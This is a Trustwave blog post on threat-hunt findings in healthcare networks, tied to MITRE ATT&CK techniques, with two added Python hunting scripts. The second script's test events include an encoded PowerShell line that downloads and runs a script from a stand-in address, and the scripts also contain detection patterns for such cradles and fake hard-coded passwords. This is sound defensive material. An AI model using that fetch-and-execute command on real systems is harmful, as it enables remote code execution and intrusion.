Trustwave Threat Hunt Team Uncovers Healthcare Industry Vulnerabilities
The healthcare industry has been struck with a growing number of cyberattacks over the last few months, raising concerns both within the industry and in Washington, D.C. The continued onslaught of attacks has raised the question of how healthcare entities can and should raise their cyber defenses. One potential tool in the toolbox of a hospital, or of any other industry, is Trustwave's patent-pending Advanced Continual Threat Hunt (ACTH) platform.
Trustwave SpiderLabs ACTH is uniquely positioned to hunt threats in client networks. The solution's effectiveness is evident from findings over the last nine months within the healthcare industry, covering thousands of endpoints, during which ACTH found numerous issues related to password management, human error, and flawed custom applications used by healthcare facilities.
The Need to Proactively Spot Cyber Issues
All industries need the capability to proactively spot malware and vulnerabilities before they are used to launch an attack, but the threat to healthcare is top of mind for security professionals and even elected officials, who are now raising the alarm.
The U.S. Senate Committee on Homeland Security & Governmental Affairs on March 16 held a hearing entitled, In Need of a Checkup: Examining the Cybersecurity Risks to the Healthcare Sector. Appearing before the committee were cybersecurity representatives from the healthcare field.
"Healthcare is a rapidly growing sector of our economy that employs more than 18 million workers and is made up of both public and private sector organizations related to patient services, medical devices and manufacturers, and electronic health and medical records that store considerable amounts of personal information, making them frequent targets of attacks," said Committee Chairman Sen. Gary Peters (D-Mich.) in his opening remarks.
What Trustwave’s Human-Led, Behavior-Based Hunts Discovered
The password management issues map to two MITRE ATT&CK techniques: T1078 Valid Accounts and T1552 Unsecured Credentials.
About 30% of the team's findings are related to T1078. In this category, administrative accounts with passwords older than one year were the biggest concern. These accounts are among the first targets threat actors look to exploit: compromising a weak or unmanaged administrative account lets a threat actor elevate privileges and move laterally from system to system.
According to MITRE ATT&CK, a large number of threat actors, including APT18, APT28, and Carbanak, use this technique. When successful, these groups obtain and abuse credentials of existing accounts to gain initial access, persistence, privilege escalation, or defense evasion. Compromised credentials can also be used to bypass access controls placed on various resources on systems within the network, and for persistent access to remote systems and externally available services such as VPNs, Outlook Web Access, network devices, and remote desktop.
Our behavior-based hunts reveal that 22% of our findings in healthcare are related to T1552 Unsecured Credentials.
T1552 covers the cases where we see custom applications or scripts running with passwords in clear text or hard-coded in the script itself. MITRE ATT&CK notes that adversaries using this technique may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g., Bash history), operating system or application-specific repositories (e.g., credentials in the Registry), or other specialized files/artifacts (e.g., private keys).
An attacker can also use T1552 in conjunction with T1078. When a threat actor can scrape or 'sniff' the password from one of these applications, and that password belongs to an administrative account without good password rotation (T1078 Valid Accounts), the result is an easy one-two punch that turns an initial foothold into privileged access across the environment.
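The two hunts described above, stale privileged accounts (T1078) and literal secrets in scripts (T1552), and the correlation between them can be expressed in a short script. The following is an added example written for this article, not Trustwave or ACTH code. It reads a constructed directory export of the shape an Active Directory query produces, flags enabled members of privileged groups whose password is older than a year, scans constructed scripts for hard-coded passwords, and then joins the two lists. The account names, group memberships, dates, script contents, secrets and the fixed hunt date of 2022-06-01 are all invented so that the output is reproducible.

```python
"""Hunt for T1078 (stale privileged accounts) and T1552 (secrets in scripts).

Added example for this article, not Trustwave or ACTH code. The directory
export, group names, scripts, dates and secrets below are all constructed.
"""
import csv
import io
import re
from datetime import datetime, timezone

# Constructed: the shape of an AD export such as Get-ADUser ... | Export-Csv.
ACCOUNT_EXPORT = """\
SamAccountName,Enabled,PasswordLastSet,MemberOf
svc_backup,True,2020-11-02T08:15:00Z,Domain Admins
adm_jdoe,True,2022-05-30T12:00:00Z,Domain Admins
svc_pacs,True,2019-03-14T09:30:00Z,Administrators
old_admin,False,2018-01-01T00:00:00Z,Domain Admins
nurse_kim,True,2021-01-20T07:45:00Z,Domain Users
"""
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
NOW = datetime(2022, 6, 1, 12, 0, tzinfo=timezone.utc)  # fixed hunt date for reproducible output

# Constructed: scripts of the kind that end up on clinical and back-office hosts.
SCRIPTS = {
    "sync_pacs.ps1": "$user = 'CORP\\svc_pacs'\n"
                     "$pass = 'Winter2019!'\n"
                     "net use Z: \\\\pacs01\\images /user:$user $pass\n",
    "backup.sh": "#!/bin/sh\n"
                 "# nightly EHR database dump\n"
                 "mysqldump -u svc_backup --password=Backup#2020 ehr > /mnt/backup/ehr.sql\n",
    "report.py": "import os\n"
                 "token = os.environ['REPORT_TOKEN']  # read from the environment: not a finding\n",
}

# Literal-secret patterns; the last capture group is the candidate secret.
CREDENTIAL_PATTERNS = [
    ("assignment", re.compile(r"""\$?(?:pass(?:word)?|pwd|secret|token)\s*=\s*['"]([^'"]+)['"]""", re.I)),
    ("cli-flag", re.compile(r"(?:--password|-p)[= ]+(\S+)")),
    ("net-use", re.compile(r"/user:(\S+)\s+(\S+)", re.I)),
]
# Account names that sit next to those secrets, used to tie T1552 back to T1078.
USER_PATTERN = re.compile(r"""(?:(?<![\w-])(?:--user|-u)\s+|/user:|\$user\s*=\s*)['"]?([^'"\s]+)""", re.I)


def stale_privileged_accounts(export_csv, now=NOW, max_age_days=365):
    """T1078 hunt: {account: password_age_days} for enabled members of a
    privileged group whose password is older than max_age_days."""
    stale = {}
    for row in csv.DictReader(io.StringIO(export_csv)):
        if row["Enabled"] != "True":
            continue  # disabled accounts are a separate hygiene finding
        groups = {g.strip() for g in row["MemberOf"].split(";")}
        if not groups & PRIVILEGED_GROUPS:
            continue
        last_set = datetime.strptime(row["PasswordLastSet"], "%Y-%m-%dT%H:%M:%SZ")
        age = (now - last_set.replace(tzinfo=timezone.utc)).days
        if age > max_age_days:
            stale[row["SamAccountName"]] = age
    return stale


def find_hardcoded_credentials(scripts):
    """T1552 hunt: returns ([(script, line_no, kind)], {script: {usernames}}).
    Values that are variable references ($pass) are skipped, so the literal
    secret is reported where it is assigned, not where it is used."""
    findings, users = [], {}
    for name, text in scripts.items():
        for line_no, line in enumerate(text.splitlines(), 1):
            for kind, pattern in CREDENTIAL_PATTERNS:
                m = pattern.search(line)
                if m and not m.group(m.lastindex).startswith("$"):
                    findings.append((name, line_no, kind))
            m = USER_PATTERN.search(line)
            if m and not m.group(1).startswith("$"):
                users.setdefault(name, set()).add(m.group(1).split("\\")[-1].lower())
    return findings, users


def correlate(stale, findings, users):
    """The one-two punch: stale privileged accounts whose name appears in a
    script that also carries a literal secret. Returns {account: [scripts]}."""
    scripts_with_secrets = {script for script, _, _ in findings}
    hits = {}
    for script, names in users.items():
        if script not in scripts_with_secrets:
            continue
        for account in stale:
            if account.lower() in names:
                hits.setdefault(account, []).append(script)
    return hits


def run_hunt(export_csv=ACCOUNT_EXPORT, scripts=SCRIPTS, now=NOW):
    stale = stale_privileged_accounts(export_csv, now)
    findings, users = find_hardcoded_credentials(scripts)
    return {"stale": stale, "findings": findings, "hits": correlate(stale, findings, users)}


if __name__ == "__main__":
    for key, value in run_hunt().items():
        print(f"{key}: {value}")
```

On the constructed data the hunt reports svc_backup and svc_pacs as stale privileged accounts (576 and 1175 days), two literal secrets (the PowerShell assignment and the mysqldump flag), no finding for the script that reads its token from the environment, and both stale accounts as correlated hits. In a real hunt the export comes from the directory and the scripts from an EDR file inventory; the `$`-prefix filter matters because the `net use` line references variables rather than carrying the secret itself.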
Providing modern healthcare requires the use of hundreds of devices. Some are extremely critical, such as monitors, scanning equipment, and pumps, while others can be as innocuous as a CCTV camera. What they all have in common is that they require an application to do their job.
In 30% of its findings, the Threat Hunt team found problems related to MITRE ATT&CK T1059 Command and Scripting Interpreter.
MITRE noted that adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities. For example, macOS and Linux distributions include some flavor of Unix Shell, while Windows installations include the Windows Command Shell and PowerShell.
Threat actors may abuse these technologies in various ways to execute arbitrary commands. For example, commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing command and control node. Adversaries may also execute commands through interactive terminals/shells and utilize various Remote Services to achieve remote Execution.
This activity does not come as a surprise, as many custom applications find their way into healthcare environments. It's important to know the applications, custom and commercial, running in the environment, because many threat actors will place their tools in locations that let them hide in plain sight, where they appear to be just another custom app.
Somewhat less frequent were findings related to T1204 User Execution, specifically the Malicious File sub-technique (T1204.002). These accounted for 12% of the Threat Hunt team's findings.
This technique relies on a user taking a specific action that results in malicious activity being executed, MITRE reports, adding that users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions are typically observed as follow-on behavior from some form of phishing.
Whether it's adware, a potentially unwanted program (PUP), or malware from a phishing email, end users are generally the ones who bring the unwanted code in. Getting a user to execute malware is often the first stage of an attack, and something seemingly trivial like adware or an unwanted browser add-on, combined with the other techniques above, can lead to a full-scale ransomware attack.
In one example cited by MITRE, the threat group LAPSUS$ recruited people in the target organization, or a contractor, who provided credentials and approved an associated multifactor authentication prompt. Such a person may also have installed remote management software onto a corporate workstation that allowed LAPSUS$ to take control of an authenticated system.
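The T1059 and T1204 findings above both show up in the same telemetry: process-creation events. As an added example, not Trustwave or ACTH code, the script below triages constructed events of the parent/image/command-line shape an EDR exposes. It flags script interpreters spawned by document applications (the follow-on behavior of a user opening a malicious file), decodes `-EncodedCommand` payloads and looks for download cradles, and flags scripts launched from user-writable paths unless the path belongs to a known custom application, which is the "hide in plain sight" problem: without that allowlist a legitimate custom app and an attacker's tool look the same. The events, paths, the PACSAgent and EHRConnector application names and the 203.0.113.7 address are all invented.

```python
"""Triage process-creation events for T1059 / T1204 abuse.

Added example for this article, not Trustwave or ACTH code. The events,
paths, the PACSAgent and EHRConnector application names and the
203.0.113.7 address are all constructed.
"""
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")  # lower-cased path fragments
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex ", "invoke-expression")
# Quoted paths may contain spaces; unquoted ones end at whitespace.
SCRIPT_PATH = re.compile(
    r'"([a-z]:\\[^"]+?\.(?:ps1|bat|cmd|vbs|js|hta)\b)"|([a-z]:\\\S+?\.(?:ps1|bat|cmd|vbs|js|hta)\b)', re.I)
# Common spellings of -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Constructed: directories of known custom applications where scripts are expected.
KNOWN_CUSTOM_APPS = ("c:\\programdata\\pacsagent\\",)


def encode_ps(command):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


EVENTS = [  # constructed parent / image / command-line triples
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')")},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\PACSAgent\sync.bat"},
    {"parent": r"C:\Users\nurse\AppData\Local\Temp\updater.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\nurse\AppData\Local\Temp\inv.vbs"'},
    {"parent": r"C:\Program Files\EHRConnector\connector.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\EHRConnector\scripts\nightly.ps1"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def script_paths(cmdline):
    return [m.group(1) or m.group(2) for m in SCRIPT_PATH.finditer(cmdline)]


def triage_event(event, allowlist=KNOWN_CUSTOM_APPS):
    """Return {"flags": [...], "decoded": ...} for a suspicious interpreter launch, else None."""
    if basename(event["image"]) not in INTERPRETERS:
        return None
    flags = set()
    if basename(event["parent"]) in DOCUMENT_APPS:
        flags.add("office_parent")          # T1204: document app spawning an interpreter
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        flags.add("encoded_command")        # T1059.001: obfuscated command line
    visible = (event["cmdline"] + " " + (decoded or "")).lower()
    if any(marker in visible for marker in CRADLE_MARKERS):
        flags.add("download_cradle")        # fetch-and-execute from a remote host
    for path in script_paths(event["cmdline"]):
        low = path.lower()
        if low.startswith(allowlist):
            continue                        # known custom app: expected, leave it
        if any(fragment in low for fragment in USER_WRITABLE):
            flags.add("script_in_user_writable_path")
    return {"flags": sorted(flags), "decoded": decoded} if flags else None


def hunt(events, allowlist=KNOWN_CUSTOM_APPS):
    """Map event index to its triage result for every event that raised a flag."""
    results = {}
    for index, event in enumerate(events):
        result = triage_event(event, allowlist)
        if result:
            results[index] = result
    return results


if __name__ == "__main__":
    for index, result in hunt(EVENTS).items():
        print(index, result["flags"], result["decoded"])
```

On the constructed events only the Word-spawned encoded PowerShell (three flags, with the decoded cradle shown) and the VBScript run out of a user's Temp folder are reported; the PACSAgent batch file is skipped because its directory is on the custom-application allowlist, and the same event is flagged as soon as the allowlist is emptied, which is why an inventory of custom applications is a prerequisite for this hunt rather than an afterthought.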
The Trustwave Advantage
Trustwave SpiderLabs is uniquely positioned to hunt threats in client networks using the Threat Hunt team's recently revamped and relaunched ACTH platform. ACTH is a proactive, Tactics, Techniques and Procedures (TTP)-focused threat-hunting platform and methodology based on the MITRE ATT&CK framework, resulting in a 3x increase in behavior-based threat findings.
The solution allows the elite SpiderLabs Threat Hunting team to conduct more, and higher-quality, human-led threat hunts per year to find indicators of behavior across Trustwave's global client base. Because ACTH supports multiple Endpoint Detection and Response (EDR) tools, Trustwave has access to a larger pool of queries that can be used to find threats.
Trustwave ACTH provides:
- Identification of behaviors that are opportunities for compromise in 100% of the hunts we perform
- Discovery of adversaries that evade initial detection by security technologies
- Discovery of new Indicators of Compromise
- Discovery of open risks that attackers exploit
- Best practice risk mitigation recommendations
- Better outcomes for protection and detection capabilities across all Trustwave clients as threat intelligence is enriched with new threat hunt findings
- Report findings and incident tickets in the Trustwave Fusion platform
ACTH supports the most popular tools available, such as Microsoft Defender for Endpoint, Palo Alto Networks Cortex XDR, SentinelOne, VMware Hosted EDR (Carbon Black Response), VMware Enterprise EDR (Carbon Black Threat Hunter), and Cybereason.
Trustwave’s Cybersecurity Prescription for Healthcare
Trustwave has a plan in place when it comes to protecting healthcare clients. This plan centers on controlling risks and meeting compliance demands.
Trustwave accomplishes this by assessing and responding to the risks brought on by data, cloud, mobility and business partners, and by helping you with HIPAA compliance through Trustwave's HIPAA Compliance Pre-Assessment and HIPAA Compliance Readiness Service.
During the pre-assessment, consultants will evaluate your organization's existing HIPAA compliance through documentation and business process reviews to identify critical and high-risk findings. Your compliance program will be evaluated against all aspects of the HIPAA Omnibus standards.
The readiness service evaluates your existing compliance posture against the HIPAA standards in a different fashion, by conducting interviews and a documentation review, with the results again evaluated against all aspects of the HIPAA standard.
CASE STUDY
Incident Preparedness Case Study in Healthcare
The complexity of today's cyber threat landscape requires organizations not only to maintain their cybersecurity controls, but also to be sufficiently prepared to handle a security breach. For healthcare providers, an increasingly acute concern is an ineffective incident response coupled with the potential loss of sensitive data, quality of service, and patient trust. Trustwave drew on its significant experience in breach response to design a custom Tabletop Exercise for a health services provider looking to be better prepared.
About the Author
Shawn Kanady is Senior Director, SpiderLabs Hunt and Intelligence at Trustwave with over 20 years of experience in IT and security. He leads the team by example, applying his DFIR knowledge to create industry best practices. Follow Shawn on LinkedIn.
ABOUT TRUSTWAVE
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.